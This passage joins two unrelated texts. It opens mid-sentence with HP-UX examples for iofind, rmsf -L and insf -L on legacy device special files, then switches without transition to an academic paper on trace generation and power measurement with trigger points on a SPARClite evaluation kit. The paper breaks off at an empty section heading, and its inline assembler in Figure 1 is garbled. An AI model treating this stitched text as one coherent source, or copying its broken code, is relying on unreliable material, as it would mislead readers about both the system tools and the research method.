/var/adm/iofind/logs/mmddyy_hhmmss/backup.
**Example 3** – Search for all possible DSFs and hardware paths across all files on the system. For this, run the following command:
```
# iofind -n -H -d /
```
Note: As this command may take a long time to execute, users may want to redirect the output to a file
myoutput, execute the command in background, and monitor the progress by looking at the increasing size of
the myoutput file. The command syntax is as follows:
```
# iofind -n -H -d / > myoutput &
```
This command generates a list of known DSFs and hardware paths from `ioscan -kfn` and searches all files
under / and its subdirectories, except for the files and directories listed in the exclusion list. This command may
take a long time to execute as it must check all the ASCII files on the system.
If users want to do an automatic replacement of DSF names and hardware paths found in any files, re-run the
command adding the option `-R`; adding `-F` will execute the replacements without asking for permission:
```
# iofind -n -H -d / -R -F
```
**Examples of using rmsf -L, insf -Lv, and insf -L**
**Example 1** – To disable legacy mode, run:
```
# rmsf -L
```
WARNING: This command may be disruptive to the system.
Before running this command, make sure you have first run
iofind(1M) and migrated all applications using legacy device
special files. Please refer to the man page of rmsf(1M) to
verify the possible side effects of the option `-L'.
Do you want to continue?
(You must respond with 'y' or 'n').: y
rmsf: Legacy mode has been successfully disabled
**Example 2** – To verify whether legacy mode is disabled, run:
```
# insf -L -v
```
insf: Legacy mode is disabled
– To verify that all legacy DSFs are removed, run:
```
# ioscan -kfn
```
- The ioscan output does not display any entries for mass storage devices.
- The legacy DSF directories (/dev/dsk, /dev/rdsk, /dev/rmt) are empty.
**Example 3** – To re-enable legacy mode, run:
```
# insf -L
```
This command will re-install all legacy I/O nodes and legacy DSFs.
Do you want to continue?
(You must respond with 'y' or 'n').: y
insf: Legacy mode has been successfully enabled
– To verify that the legacy mode has been re-enabled, run:
# ioscan -kfn
- The ioscan output again shows the entries for the mass storage devices.
- The DSFs are recreated in the `/dev/dsk`, `/dev/rdsk`, and `/dev/rmt` directories.
Compact Trace Generation and Power Measurement in Software Emulation
Fabian Wolf, Judita Kruse, Rolf Ernst
Institut für Datenverarbeitungsanlagen, Technische Universität Braunschweig
Hans-Sommer-Str. 66, D-38106 Braunschweig, Germany
Tel: +49 531 391 3728, Fax: +49 531 391 4587
Email: {wolf|kruse|ernst}@ida.ing.tu-bs.de
ABSTRACT
Evaluation boards are popular as prototyping platforms in embedded software development. They often are preferred over simulation to avoid modeling effort and simulation times as well as over complete hardware prototypes to avoid development cost. Evaluation boards provide accurate timing results as long as the main architecture parameters match the target hardware system. For larger processors, this is often not the case since the cache and main memory architectures might differ. Another problem is the lack of observability of the software execution. Pin-Out versions of processors with improved observability are expensive (so are in-circuit emulators) and not always available, and on-chip processor test support requires software adaptation. A particular problem arises when trying to verify the running time bounds of embedded software such as required for hard real-time systems. Here, formal analysis approaches have been proposed which require segment-wise execution of a program under investigation. Another problem is the accurate analysis of processor power consumption for different execution paths.
The paper presents an approach to fast acquisition of compact timed execution traces with instruction cycle accurate power samples on commercial evaluation kits. Global system modeling abstracts the environment to a set of parameters that is included in the software under investigation for segment-wise, real-time execution. Trigger points write source code line numbers and energy samples to the address and data bus where they are read by a logic state analyzer. Experiments show that the application of trigger points avoids the acquisition of long, complete traces on sophisticated, dedicated prototyping platforms as in previous work while more accurate execution time and power consumption can be delivered.
Keywords: Software Emulation, Program Trace Generation, Software Timing and Power Measurement
1. INTRODUCTION
Embedded system running time and power analysis are required for validation and design space exploration of embedded systems. Due to the increasing amount of software on reusable target architectures, fast and accurate software running time and power analysis play an important role in VLSI system design while rapid prototyping needs early physical execution. Test patterns can instrument the program under investigation for execution while static approaches isolate executable program segments from the program.\(^1\,2\) We investigated the possibility of using commercial evaluation kits and a logic state analyzer with network access for fast and accurate acquisition of embedded system software execution time and power consumption.
For the verification of hard real-time systems, formal analysis approaches require segment-wise, real-time execution and measurement of the program under investigation. The original cache behavior has to be preserved and acquired because it has a major impact on execution time. Cycle accurate power consumption needs to be measured without changing the execution context of the instructions under investigation. These requirements are impossible to meet with most existing approaches where sophisticated communication of the complete processor under investigation with its environment results in unacceptable emulation times. In these approaches, major changes to the instrumented program invalidate its original cache behavior and power consumption while measurement results are only available for single instructions or the complete program. In the presented approach, beforehand system modeling\(^3\) can deliver the relevant parameters of the surrounding components that are integrated as far as possible at compile time. This allows real-time execution and measurement of the instrumented program or isolated program segments while relevant information is stored in a very compact trace. An off-the-shelf processor evaluation kit and very little hardware for power measurement are needed. Digital values are stored by the instrumented program under test itself. A logic state analyzer with a network connection to the development platform is used to measure execution time and power consumption in a very efficient way that abstracts the board hardware to a processor simulator.
This paper is organized as follows: Section 2 reflects previous work. Section 3 introduces the code instrumentation of programs before section 4 explains our approach to measurement of execution time. Section 5 explains our approach to power measurement. Section 6 presents experiments with a commercial evaluation kit before we conclude in section 7.
2. PREVIOUS WORK
Processor evaluation kits with PCI bus interfaces are state-of-the-art in embedded system software emulation using desktop personal computers. They are often preferred to simulation since they avoid the necessity to include processor models and develop models for the embedded system environment. Accurate processor models are often hard to get and environment model development extends design time and cost. Most software development environments are tool suites with built-in debuggers that run on a host PC or work station and communicate with the evaluation kit. The compilers generate special executable files for debugging. This is a cost effective approach, but it lacks the capability of detailed software execution analysis, such as the detection and analysis of "hot spots" in the program execution, i.e. parts of a program which are executed frequently or consume high energy. Moreover, evaluation board memory architecture is often different from the target architecture. To overcome the different drawbacks, several research groups have presented different prototyping and measurement approaches with real-time execution of the program under investigation.
The dedicated BACH address tracing platform\(^4\) is used to collect an Intel 486 specific trace. It collects all access addresses while source line numbers are needed for software emulation. Traces get long and are hard to back annotate to the source code of the program under investigation. Caches are switched off during tracing, so no relevant performance metrics can be estimated. The system also lacks a time base for the trace. As the time tracing hardware was specially built for the Intel 486 it is hard to be used for other processor types such as RISCs. Another approach with a dedicated architecture\(^5\) called TimerMon instruments the code with write references to a special trace memory including event ID and timestamp for timing measurement when executing the program under investigation. A time base is present, but caches are not regarded in this approach. No power measurement is part of these previous approaches while both need sophisticated, dedicated hardware to store the traces.
Experiments with SPARC and DSP evaluation platforms\(^6\) can be done in a very efficient way. Execution time and power consumption of single machine instructions are determined by executing them in a loop. An analog ampere meter is used to measure the average current in the board supply line for power measurement. The metrics are used in an instruction timing addition approach\(^1\) extended to an instruction energy addition approach. No remote access for starting the measurement or automatic evaluation and exploitation of the measurement results is possible. The supply current of the complete board is measured, so the power consumption of the processor cannot be separated from that of the memories and the other components on the board. No instruction cycle accurate measurement is possible because the system lacks a time base and the possibility to store measured values after a trigger definition. Instruction energy consumptions are measured in a loop instead of the real context of the program, thus the values are extremely inaccurate, especially when caches, pipelines and global register sets are present. This is a common case with RISC processors resulting in overlapping instruction execution. As the system also lacks the possibility to store a power trace, the measurement of a complete program or program segment is not possible.
These research approaches cannot automatically reference the line numbers of the source code. Often only execution time and power consumption of either the complete program or single instructions on the complete board under investigation can be measured while the delivered trace only contains an address sequence without execution time, power consumption, cache behavior or references to program segments in the source code. Caches that have a substantial effect on execution time and power consumption are either not present or switched off in the presented approaches. This can be overcome by using fast cache simulation\(^7\) but none of the reviewed approaches can deliver accurate results for execution time and power consumption of program segments on more complex processor hardware.
3. CODE INSTRUMENTATION AND PROGRAM PARTITIONING
The software under investigation usually contains control structures that depend on input data, while measurement needs an execution of the program. For this purpose, a test pattern representing one possible input data set can be given, leading to one execution and a corresponding measurement of the program that is only valid for this test pattern. This enables us to use our approach for the complete program. Segment-wise execution time and power consumption are needed as a base for static validation of real-time embedded software,\(^2\) so every segment needs to be executed. We need to mark the beginning and the end of a complete program or a program segment to measure its execution time and power consumption. This is done with trigger points. These points mark the source code to be measured and can be recognized with the logic state analyzer connected to the processor bus. The beginning and the end of the program segment under investigation are marked. Trigger points are implemented by store instructions to non-cached memory spaces. Details are explained in section 4.
Test patterns might not reflect the best or worst cases of running time or power consumption. Static analysis explores feasible and infeasible execution paths\(^{1,2}\), possibly supported by designer interaction.\(^8\) Program segment execution time and power consumption can be measured with our approach. In the following, we present different possibilities for the instrumentation of the complete program or the program segments under investigation.
3.1. Instrumentation of the Complete Source Code
For timing and power measurement on the evaluation kit, the program can be executed as a whole using test patterns or any set of input data. Where control structures depend on input data, paths for best case and worst case execution may differ from the control flow given by the test patterns. This may be solved by path analysis\(^{8,2,1}\) which is beyond the scope of this paper. As long as test patterns cover every program segment, we mark the beginning and the end of a program segment with a trigger point. Execution of the program segment permits the measurement of its execution time and power consumption, which is a base for the calculation of the worst case and best case execution time or power consumption bounds of the feasible paths. This results in the upper and lower bounds for the execution time and power consumption of the complete program.
3.2. Instrumentation of Isolated Program Segments
If program segments are not reached in the execution of the instrumented program because the test patterns do not cover all potential execution paths, while standalone execution of the missing program segment is possible, they can be extracted and executed separately. To do so, they are loaded to the base address they would be mapped to when the complete program is given to the linker. The map file delivers this information. The used variables must be initialized to avoid, for example, divide-by-zero effects. A standard data flow analysis\(^9\) provides the variables to be declared and initialized to their start values to make physical execution of the program segment possible.
3.3. Simulation of Program Segments
The program segment or complete program can be simulated as a reference solution using given input data and a cycle-true processor model\(^{10}\) which can exactly deliver processor execution time or power consumption. This can be any well established, off-the-shelf processor simulator provided by the processor vendor. As an example of cycle-true processor simulation that delivers the execution time or power consumption of the program, a StrongARM simulator core is combined with the DINERO cache simulator\(^7\) delivering both instruction and data cache behavior. The source code has been recompiled for the simulator. Architecture modeling regarding execution time is given by the Cygnus simulator while the energy dissipation model\(^{6,11}\) is directly based on the execution time in a first approach. Compared to the evaluation kits, simulation is slow or inaccurate, and the simulator might not be available at processor release time, which makes execution on prototyping hardware attractive.
3.4. Execution on the Evaluation Kit
After the code under investigation has been cross-compiled for the processor on the evaluation kit, it is downloaded to its memory. This is the only downlink communication; the execution runs in real-time during the measurement. If different processes need to be measured at once, a real-time operating system (RTOS) that allows unrestricted memory access should be installed on the evaluation kit.
4. TIMED TRIGGER POINT TRACE
When programs or program segments can be executed by code instrumentation or path extraction, the trace and the resulting execution time and power consumption of the executed code can be obtained by measurement. Previous approaches store the full address sequence of data and address bus which leads to memory consuming program traces. We reduce the trace of the program by using trigger points.
4.1. Compact Trace Generation
Trigger points mark the beginning and the end of a program or a program segment that we need to measure the execution time for. Relevant program segments can be determined with the SYMTA path analysis tool suite.\cite{2,1} If we only need the timing for the segment, we trigger a clock that is using the system clock of the board when we pass the first trigger point and stop it when we pass the last one. Intermediate program behavior is not needed. The trigger points have to contain information about the source code lines the program segments begin and end at to permit a back annotation of the timing to the program under investigation. In our approach, several steps are needed to implement a fully automated measurement and back annotation of results for execution time and power consumption to the source code.
1. Trigger points need to be inserted into the source code. To preserve the program structure with automatic trigger point insertion, every block belonging to a control structure needs to be set in curly braces \{ \}. This is done in a recursive descent. After that, trigger points are automatically inserted into the code. A table with source line cross references is built for later back annotation.
2. A trigger point is implemented by a store of the source code line information to a defined trigger address in a non-cached part of the memory space. An architecture-specific example is given in figure 1. Unlike previous work, this method allows the use of the processor cache. The store instructions are instrumented as inline assembler lines in the C source code. Assembler instruction and trigger address can easily be changed for various architectures, while the trigger point locations have to be a conservative selection with respect to pipeline and cache behavior as well as the global register allocation.
3. During execution, the trigger points are found by monitoring the address bus with a logic state analyzer. The associated data is stored, containing the current source line number. The line numbers of the trigger points with corresponding logic state analyzer time stamps are stored instead of full traces. Address and data bus can either be measured at extra connections at the processor pins or by connecting the probe to a bus slot of the evaluation board. The time base for the offset between the trigger points is calculated by the logic state analyzer using the board clock, not by dedicated hardware like in previous approaches.
4. The development platform reads the results from the logic state analyzer via a simple ftp session. This raw data can be evaluated in many ways. Execution time of the whole program and execution counts plus execution time of program segments between trigger points can be achieved. An example of an instrumented program and the resulting intermediate logic state analyzer format can be seen in figure 6. Best case, worst case, first or last executions of the program segments marked by trigger points can be computed as well as the averages.
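The evaluation of the raw analyzer data can be sketched in a few lines. The following Python fragment is illustrative only: the record layout mirrors the intermediate format described above (trigger point number, trigger address, file ID, source line, state offset), and the 25 ns state period is an assumed 40 MHz board clock, not a measured value.

```python
# Illustrative parser for the intermediate logic state analyzer format:
# each record holds trigger point number, trigger address, file ID,
# source code line number and the timing offset in states relative
# to the previous trigger point.

STATE_NS = 25.0  # assumed board clock period (40 MHz bus clock)

def parse_trace(records):
    """Turn (tp, addr, file_id, line, state_offset) tuples into
    (line, time_ns_since_previous_trigger) entries."""
    return [(line, states * STATE_NS) for _, _, _, line, states in records]

def segment_time_ns(trace, begin_line, end_line):
    """Accumulate the time spent between a BEGIN and an END trigger line,
    summed over all iterations across the segment."""
    total, running, active = 0.0, 0.0, False
    for line, dt in trace:
        if active:
            running += dt
        if line == begin_line:
            active, running = True, 0.0
        elif line == end_line and active:
            total += running
            active = False
    return total

# hypothetical records: two iterations of a segment between lines 10 and 14
demo = [(1, 0xA000018, 8, 10, 0),
        (2, 0xA000018, 8, 14, 120),
        (3, 0xA000018, 8, 10, 80),
        (4, 0xA000018, 8, 14, 120)]
trace = parse_trace(demo)
```

With the assumed clock, the two iterations add up to 6000 ns; best case, worst case, first and last executions can be derived from the same trace.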
4.2. Exploitation of Trigger Points and Back Annotation
In a first step, we have to mark the source code lines that we want to measure the execution time and power for. This needs a file denominating these lines in ascending order separated by newlines, called the definition file. We define a format for a trigger point comment that supports the direct determination of the source lines.
```
/* TPcommentID: TPdefinition1, TPdefinition2, .. */
TPcommentID  : %TP
TPdefinition : TPname : TPkind
TPname       : string
TPkind       : BEGIN | SIMPLE | END
```
A trigger point comment is composed of one or more trigger point definitions, each of which consists of a trigger point name and a trigger point kind. Any string constant can be chosen for a trigger point name, while all trigger points with the same name are collected in a trigger point class. The first trigger point of a class will be marked as BEGIN, the last as END and the others as SIMPLE. It is also possible to set all trigger points of a class to the kind SIMPLE. The trigger point comment should be written exactly in the line before the line of interest. Only for an END point does it make sense to place it behind the last instruction of interest. A tool reads the source code with trigger point comments and creates the definition file according to the coded information and the given trigger point class. It is possible to create the definition file with other tools or even manually. As we insert additional source code into a program, we have to preserve the consistency of the program. Control structures like if-else permit the writing of single dependent C instructions without applying braces. In the case of triggering on such single dependent instructions, we have to insert additional braces, because now there are two instructions depending on the same control structure, namely the inline assembler line and the instruction of interest. We set braces around every instruction block using a recursive descent.
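A minimal sketch of the tool that turns trigger point comments into a definition file might look as follows; the comment syntax follows the grammar above, while the example source lines are hypothetical and the convention that a comment marks the directly following line is taken from the text.

```python
import re

# Illustrative parser for trigger point comments of the form
#   /* %TP: name:KIND, ... */
# with KIND in BEGIN | SIMPLE | END. A comment in line i marks the
# directly following source line i+1; the definition file lists the
# marked lines in ascending order.

TP_RE = re.compile(r'/\*\s*%TP:\s*(.*?)\s*\*/')

def definition_lines(source_lines):
    marked = []
    for i, text in enumerate(source_lines, start=1):
        m = TP_RE.search(text)
        if not m:
            continue
        defs = []
        for d in m.group(1).split(','):
            name, kind = (s.strip() for s in d.split(':'))
            assert kind in ('BEGIN', 'SIMPLE', 'END')
            defs.append((name, kind))
        marked.append((i + 1, defs))  # comment marks the next line
    return marked

# hypothetical instrumented source
src = [
    'int main(void) {',
    '/* %TP: sort:BEGIN */',
    '  bubble();',
    '/* %TP: sort:END */',
    '  return 0;',
    '}',
]
```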
The next step is the insertion of the inline assembler lines. The insertion is done by reading the prepared C file and by writing the architecture specific inline assembler lines to the line numbers, which are denominated in the definition file. The cross references of the original, the prepared and the trigger point file line numbers are stored in a table file. Finally the executable program is compiled by a standard C compiler. We automatically generate different control files for the logic state analyzer and the power device. Other control files are needed as input files for the terminal program of the evaluation kit. The measurement starts with a complete reset of the board by the software driven power control. The executable program is downloaded to the evaluation kit and the setup program containing the trigger sequence is loaded to the logic state analyzer. After program execution the logic state analyzer is stopped, and the results are transferred from the analyzer to the host.
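The cross-reference table that tracks shifting line numbers can be sketched like this; the insert positions are hypothetical and each inserted inline assembler line is assumed to occupy exactly one line.

```python
# Illustrative cross-reference between original and instrumented line
# numbers: every inserted inline assembler line shifts all following
# original lines down by one.

def cross_reference(n_original_lines, insert_before):
    """Map original line number -> line number in the instrumented file,
    given the original lines that get a trigger line inserted before them."""
    table, shift = {}, 0
    pending = sorted(insert_before)
    for line in range(1, n_original_lines + 1):
        while pending and pending[0] == line:
            pending.pop(0)
            shift += 1
        table[line] = line + shift
    return table

# hypothetical: six-line file, trigger lines inserted before lines 2 and 5
table = cross_reference(6, insert_before=[2, 5])
```

Such a table is what permits the back annotation of measured results to the original source lines.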
At last the results are evaluated on the host. As the same trigger point can be reached on different paths, it has to be analyzed in relation to the others. If there are more iterations, for example when measuring a loop, the results are given for the total number of executions. They are enumerated for the first and the last, the worst and the best cases. It is possible to mark a special iteration, too. Finally the setup overhead at program start as well as the number of trigger points passed are listed.
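The enumeration of first, last, best and worst cases over repeated executions reduces to simple aggregation; the following sketch assumes the per-iteration times have already been extracted from the trace, and the numbers are invented.

```python
# Illustrative evaluation of repeated trigger point passes: given the
# relative execution times measured for each iteration of a segment,
# report total, count, first, last, best and worst cases plus average.

def iteration_stats(times_ns):
    return {
        'count':   len(times_ns),
        'total':   sum(times_ns),
        'first':   times_ns[0],
        'last':    times_ns[-1],
        'best':    min(times_ns),
        'worst':   max(times_ns),
        'average': sum(times_ns) / len(times_ns),
    }

stats = iteration_stats([1200, 950, 1100, 950])
```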
4.3. Example: Timing Measurement for a SPARClite RISC Processor
Execution time and power consumption of program segments have been measured on a commercial SPARClite evaluation kit by inserting trigger points. The Cygnus C compiler has been used for assembly code generation. In the current setup we are using DRAMs which prevents us from separating cache misses from memory refresh as we cannot access the memory controller, but this can be overcome by analyzing the refresh strategy or selecting SRAMs when choosing an evaluation kit.
After program completion the results are back annotated to the source code. The whole measurement is software controlled including board startup by switching on its power supply from the network, trigger point insertion, compilation, downloading, execution and back annotation. An overview for the SPARClite evaluation kit and its setup is shown in figure 2. The terminal program only writes the instrumented executable program to the board, which is a fast one way communication. The program is executed in real-time before the results are read from the logic state analyzer memory.
The implementation of the trigger points for the definition of the beginning and the end of a program segment or the complete program for SPARClite is shown in figure 1. The address word contains the trigger address that is recognized by the logic state analyzer. The data bus value consists of a file identifier to distinguish between different sources. It is followed by the source code line number that is also read by the logic state analyzer. For power measurement, this trigger point is extended in section 5. The access address as well as the logic state analyzer software can easily be modified for an adaption to different evaluation kits.
```
23 __asm__ volatile ("sta %0,[%r1]%2" : *(0xa000018), "rJ" (8), "I" (7));
24 printData();
25 __asm__ volatile ("sta %0,[%r1]%2" : *(0xa00001a), "rJ" (8), "I" (7));
```
**Figure 1.** Trigger points for SPARClite emulation boards
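The data word layout described above (file identifier plus source code line number) can be illustrated with a small encoder; the 8-bit/24-bit split chosen here is an assumption for the sketch, not the layout used on the SPARClite board.

```python
# Illustrative encoding of the trigger data word: the upper bits hold a
# file identifier, the lower bits the source code line number.
# The field widths are assumptions for this sketch.

FILE_SHIFT = 24
LINE_MASK = (1 << FILE_SHIFT) - 1

def encode(file_id, line):
    return (file_id << FILE_SHIFT) | (line & LINE_MASK)

def decode(word):
    return word >> FILE_SHIFT, word & LINE_MASK

word = encode(8, 23)  # file ID 8, source line 23 as in figure 1
```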
Any commercial evaluation kit with bus access can be used for this purpose. Our current work in the prototyping area focuses on software controlled execution time and power measurement on a StrongARM evaluation kit. The automation abstracts the evaluation kit to the same level as a software simulator for the architecture modeling of a program segment.
4.4. Limitations
The insertion of trigger points into the source code modifies the program under investigation. This implies some overhead and limitations regarding measurement precision caused by the insertion of trigger points.
- We want to keep the modifications conservative, so no global compiler optimization across trigger points is allowed, pipelines and registers are flushed and the caches are reset at trigger points. Compiler optimization shifting the code line of the trigger point has to be avoided, too.
- Each trigger point implies a timing overhead when the address is written to the bus. The number of cycles depends on the architecture. This overhead can easily be subtracted from the measured timing to get the real execution time.
- While the shifting source code line numbers caused by trigger point insertion are taken care of in a table, the shifting addresses of the object code through the insertion of store instructions for the trigger points have an unpredictable effect on pipeline and cache behavior. For this reason, we try to keep the modification through trigger point insertion as small as possible by inserting trigger points only at the beginning and the end of the program segment under investigation. Reducing the number of trigger points not only helps to keep traces as compact as possible but also leads to higher measurement precision regarding the influence of the trigger points on the system under investigation.
- Another limitation is the memory depth of the logic state analyzer. Even though the trace is very compact, we can only analyze as many trigger points as the memory of the logic state analyzer can store. In comparison to dedicated time tracing platforms, this off-the-shelf memory is easy to extend.
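The overhead subtraction from the list above is simple arithmetic; in this sketch both the per-trigger cycle count and the clock period are assumed values, not SPARClite measurements.

```python
# Illustrative correction of measured segment times: each trigger point
# costs a fixed number of cycles when its store reaches the bus.
# Cycle count and clock period are assumptions for this sketch.

TRIGGER_CYCLES = 3      # assumed cost of one trigger store
CLOCK_NS = 25.0         # assumed 40 MHz bus clock

def corrected_time_ns(measured_ns, n_trigger_points):
    """Subtract the trigger point overhead from a measured time."""
    return measured_ns - n_trigger_points * TRIGGER_CYCLES * CLOCK_NS

# hypothetical segment bounded by two trigger points
t = corrected_time_ns(15625.0, 2)
```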
5. TIMED ENERGY SAMPLES
After successful implementation of the compact time tracing we extended our approach to power measurement. This extension can deliver the energy consumption of program segments or a small complete program. The instrumentation, the preparation and the insertion of trigger points into the program to mark the beginning and the end of a program segment under investigation are the same as introduced in section 4.
5.1. Hardware Setup
First of all, we need to select the core and bus frequencies we want to measure at because both influence the power consumption of board and processor. Then, a decision has to be made whether to measure the power consumption of the complete evaluation kit including processor, memories and interfaces or of the isolated processor. Measurement of the complete board power consumption is far easier as we only have to access the power connector. For isolated power measurement of the processor we have to access its on-board power regulator output current.
Power is measured by inserting a shunt resistor into the power supply line. For on-board access, the resistor has to be mounted into the power supply under investigation. For the calculation of the power consumption the voltage across the resistor is measured as we can see for SPARClite in figure 3. The setup is valid for most evaluation kits. We have to ensure that the voltage across the resistor does not reduce the supply voltage below the specified minimum input level of board or processor. This means we have to keep this voltage as small as possible by choosing a small resistor value, but then it is much too small for the input level needed for the analog-to-digital conversion. An analog amplifier generates the according input voltage with respect to value and offset for the analog-to-digital conversion. As amplification and analog-to-digital conversion have to be done at processor speed, we need very fast components and limit the measurement to eight bits, which is accurate enough in a first approach.
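The sizing trade-off between shunt drop and amplifier gain can be illustrated numerically; the load current and the ADC full-scale voltage below are assumptions for this sketch, only the 0.1 Ω shunt value appears in the text.

```python
# Illustrative sizing of shunt and amplifier: the drop across the
# resistor must stay well below the supply margin, and the amplifier
# must scale the resulting millivolt signal up to the ADC input range.
# Load current and ADC full scale are assumed values.

def shunt_drop_mv(r_ohm, current_a):
    """Voltage drop across the shunt in millivolts."""
    return r_ohm * current_a * 1000.0

def required_gain(drop_mv, adc_fullscale_v):
    """Amplifier gain needed to map the drop to the ADC full scale."""
    return adc_fullscale_v * 1000.0 / drop_mv

drop = shunt_drop_mv(0.1, 0.4)   # 0.1 ohm shunt, assumed 400 mA load
gain = required_gain(drop, 2.0)  # assumed 2 V ADC full scale
```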
Figure 2. SPARClite evaluation kit with logic state analyzer and host functionality

This kind of measurement delivers the power consumption at one point in a processor cycle while power consumption during a cycle can vary a lot due to switching effects near the clock edges. For this reason, we integrate the power consumption over a complete clock cycle which is sampled. This means we get one value for the energy consumed in the cycle with each activation of the analog-to-digital conversion. The logic state analyzer reads the digital output in parallel to the address bus, so a reference to the source code is given that can be used for sophisticated exploitation of instruction level power consumption. As we get one sample for every cycle, the influence of adjacent instruction cycles can be investigated. In other words, supply current results in a voltage across the resistor which represents the instantaneous power consumption. This is integrated to achieve the energy consumption of an instruction. In the following, the term power consumption is used because it represents all these metrics, actually meaning the energy consumption in the cycle.
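The integration of the supply current into a cycle energy can be sketched numerically; the shunt value matches the text, the supply voltage and sample spacing are plausible assumptions, and the discrete sum stands in for the analog integrator.

```python
# Illustrative integration of instantaneous power over one clock cycle:
# the shunt voltage gives the supply current, multiplying by the supply
# voltage gives power, and summing the cycle's samples approximates the
# cycle energy. Supply voltage and sample spacing are assumed values.

R_SHUNT = 0.1          # ohm, as in the text
V_SUPPLY = 3.3         # volt, assumed supply voltage
T_SAMPLE_NS = 2.5      # assumed sample spacing within a cycle

def cycle_energy_nws(shunt_mv_samples):
    energy = 0.0
    for v_mv in shunt_mv_samples:
        current_a = (v_mv / 1000.0) / R_SHUNT
        power_w = current_a * V_SUPPLY
        energy += power_w * T_SAMPLE_NS  # W * ns = nWs
    return energy

# hypothetical shunt voltage samples over one cycle, in millivolts
e = cycle_energy_nws([20.0, 40.0, 40.0, 20.0])
```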
5.2. Single Shots
Trigger points lead to a measurement of the power consumption of the cycle the instrumented instruction is executed in. This means there is absolutely no reference to the program under investigation because we measure the power consumption of the inserted trigger point. This is still necessary to be able to subtract its overhead. For measurement of single cycles, the sampling of power has to be delayed at least one cycle beyond the trigger point, but its influence is still present. Measurement of single cycles does not make much sense in energy measurement for program segments or complete programs. It is only needed to measure the power consumption of specific instruction sequences to build up a table based approach.
5.3. Continuous Measurement
For program segment measurement, at least one sample of the integrated power consumption per clock cycle is needed. Measurement is started and terminated with a trigger point like in trace acquisition. Between the trigger points only the sampled power consumption for every cycle is read with the logic state analyzer. The address bus can optionally be read for more accurate back annotation. This means that we get a trace of power samples between the trigger points, so we can assign the power consumption to a program segment. It delivers very accurate power consumption measurements compared to previous approaches while very little hardware overhead is needed. As we directly measure the power consumption of the instructions in the environment they are executed in instead of loops, their original power consumption is delivered. The same trigger points are used for timing and power measurement, so the same mechanisms for the result calculation like in section 4.2 can be used.
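Aggregating the continuous measurement into a segment energy is then a sum over the samples between the trigger points, as this sketch shows; sample values and indices are invented.

```python
# Illustrative aggregation of the continuous measurement: between the
# BEGIN and END trigger points, one energy sample per cycle is stored;
# the segment energy is their sum minus an assumed trigger overhead.

def segment_energy_nws(cycle_energies, begin_idx, end_idx,
                       trigger_overhead_nws=0.0):
    return sum(cycle_energies[begin_idx:end_idx]) - trigger_overhead_nws

# hypothetical per-cycle energies in nWs; triggers at indices 1 and 5
samples = [1.2, 1.5, 1.4, 1.3, 1.6, 1.2]
e = segment_energy_nws(samples, 1, 5)
```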
While single shots are needed for a table based approach, continuous power measurement can be applied for design space exploration of different implementations of program segments regarding their coding influence to power consumption.
5.4. Example: Power Measurement for SPARClite
We implemented the power measurement approach using the SPARClite evaluation kit that we already applied for compact timed trace generation. Figure 3 shows the hardware setup to measure the power consumption. The cycle energies measured between the trigger points are added to the total energy consumption for the trigger points. These values can be exploited in the same way as the execution times explained in section 4.2. The core frequency, being twice the bus frequency, is generated by the processor itself. This means we need two clocks, one for the bus clock of the processor and one for the measurement, which must be the same as the core frequency.

In order to permit an 80 MHz operation of the power measurement, fast components for amplification, integration and analog-to-digital conversion are needed: A precision 0.1 Ω shunt resistor in the power supply lines delivers an analog voltage of 10 to 40 mV. This ensures correct operation of all components on the board because the remaining supply voltage is still way above the minimum. The MAX436 operational amplifier with 275 MHz gain bandwidth product (GBP) is used as the differential amplifier. The power integrator uses a 39 Ω resistor, a 10 pF capacitor and an AD8012 operational amplifier with 350 MHz GBP. The same operational amplifier is used for the preamplification, followed by an NSCLC425 operational amplifier with 1.9 GHz GBP for the main amplification to gain a level suitable for analog-to-digital conversion. An ADOP27GS decouples amplification from the analog-to-digital conversion, which uses an AD9054A eight bit converter with 135 mega samples per second for fast operation. Amplification, offset and integration have to be fine-tuned to permit a coverage of the full voltage range by the eight bits of the analog-to-digital conversion to achieve a wide range of measured values. The clock generator consists of a Philips X05860 80 MHz clock for the measurement and a 74F109N flip-flop which divides the clock to 40 MHz for the processor.
Figure 4. SPARClite evaluation kit with measurement facilities
Figure 4 shows the SPARClite evaluation kit with the measurement facilities and the logic state analyzer which is connected to the local network. The small PCB on the left contains the power measurement circuit while only the evaluation kit and the logic state analyzer are needed for the trace acquisition. Figure 5 shows the frequency diagram of the whole power measurement circuit. The amplification is nearly constant until we reach the maximum frequency of the circuit, which is between 80 and 90 MHz, as can be seen in figure 5.
5.5. Limitations
For the trigger points, the same drawbacks apply as for the acquisition of the program segment execution time. The following problems are additionally introduced by power measurement.
- If the power consumption of single cycles shall be measured, trigger points have a particular influence because the change in the program is happening very near to the cycle under investigation. These local effects can be overcome by continuous measurement of the segment with the instruction under investigation and the address bus. This delivers a reference to the instruction while the trigger point can be inserted some cycles in advance. For most RISC processors, there is no possibility to read the processor and pipeline status, so there may be no exact coherence between the power trace and the assembler program while pipelined execution also influences the results for the power consumption of single instructions.
- All the measurement hardware is dependent on the processor speed of the board because the time constant for the integration has to be set with a resistor and a capacitor on the board. These have to be changed to adapt the system to other processor speeds. This is no serious restriction because the change is easy to do, while execution time and power consumption for other processor speeds can directly be calculated from the speeds we have done our measurements at.
- As eight bits for every instruction cycle are needed when power consumption is measured, we might run into problems with the logic state analyzer memory size. This is more severe than for pure trace acquisition where only the trigger points need to be stored. This problem may be overcome with source code partitioning using path analysis² and measurement of shorter program segments that allow the power trace to fit into the logic state analyzer memory.
5.6. Table Based Power Estimation Tool Suites
When execution times and power consumption of single machine instructions as well as timing or power penalties for transitions between certain instructions have been determined by measurement, these values can be used for tool-based prediction of execution time and power consumption.⁶ This is done in an instruction cost addition (ICA)² approach. Traces are then obtained by running the code on a host processor while the instruction execution cost, i.e. execution time or power consumption, is taken from a table delivered by prior measurement. The same problems as for the measurement of single shots apply.
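An instruction cost addition over a trace can be sketched as follows; the instruction names and cost tables are invented for illustration and do not reflect measured SPARClite values.

```python
# Illustrative instruction cost addition (ICA): base costs per
# instruction plus transition penalties between adjacent instruction
# pairs are summed over a trace. All cost values are invented.

BASE_COST = {'add': 1.0, 'ld': 2.0, 'st': 2.0}          # e.g. nWs
TRANSITION = {('ld', 'add'): 0.3, ('add', 'st'): 0.2}   # pair penalties

def ica_cost(trace):
    cost = sum(BASE_COST[i] for i in trace)
    cost += sum(TRANSITION.get(pair, 0.0)
                for pair in zip(trace, trace[1:]))
    return cost

c = ica_cost(['ld', 'add', 'st'])
```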
5.7. Global Access
